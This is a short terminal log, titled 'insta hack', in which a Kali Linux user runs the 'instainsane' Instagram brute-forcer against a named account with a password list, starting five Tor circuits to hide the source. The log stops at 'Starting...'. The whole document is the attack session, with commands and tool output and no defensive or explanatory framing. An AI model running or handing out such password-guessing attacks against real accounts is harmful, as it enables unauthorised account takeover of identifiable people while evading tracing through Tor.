

insta hack
Б”ҲБ”қБ”қ(kaliЦ‰©kali)-[~]
Б””Б”қ$ cd instainsane
                                                                                                                             
Б”ҲБ”қБ”қ(kaliЦ‰©kali)-[~/instainsane]
Б””Б”қ$ chmod +x instainsane.sh
                                                                                                                             
Б”ҲБ”қБ”қ(kaliЦ‰©kali)-[~/instainsane]
Б””Б”қ$ sudo ./instainsane.sh
[sudo] password for kali: 
  _              _            _____                                  
 (_) _ __   ___ | |_   __ _   \_   \ _ __   ___   __ _  _ __    ___  
 | || '_ \ / __|| __| / _` |   / /\/| '_ \ / __| / _` || '_ \  / _ \ 
 | || | | |\__ \| |_ | (_| |/\/ /_  | | | |\__ \| (_| || | | ||  __/ 
 |_||_| |_||___/ \__| \__,_|\____/  |_| |_||___/ \__,_||_| |_| \___| 

  Instagram Brute Forcer v1.0, Author: @thelinuxchoice (Github/IG)  

Username account: ashwanichauhan868
Password List (Enter to default list): pass.list
[*] Starting Tor on port: 9051
[*] Starting Tor on port: 9052
[*] Starting Tor on port: 9053
[*] Starting Tor on port: 9054
[*] Starting Tor on port: 9055
[*] Checking Tor connection on port: 9051...OK!
[*] Checking Tor connection on port: 9052...OK!
[*] Checking Tor connection on port: 9053...OK!
[*] Checking Tor connection on port: 9054...OK!
[*] Checking Tor connection on port: 9055...OK!

[*] Starting...
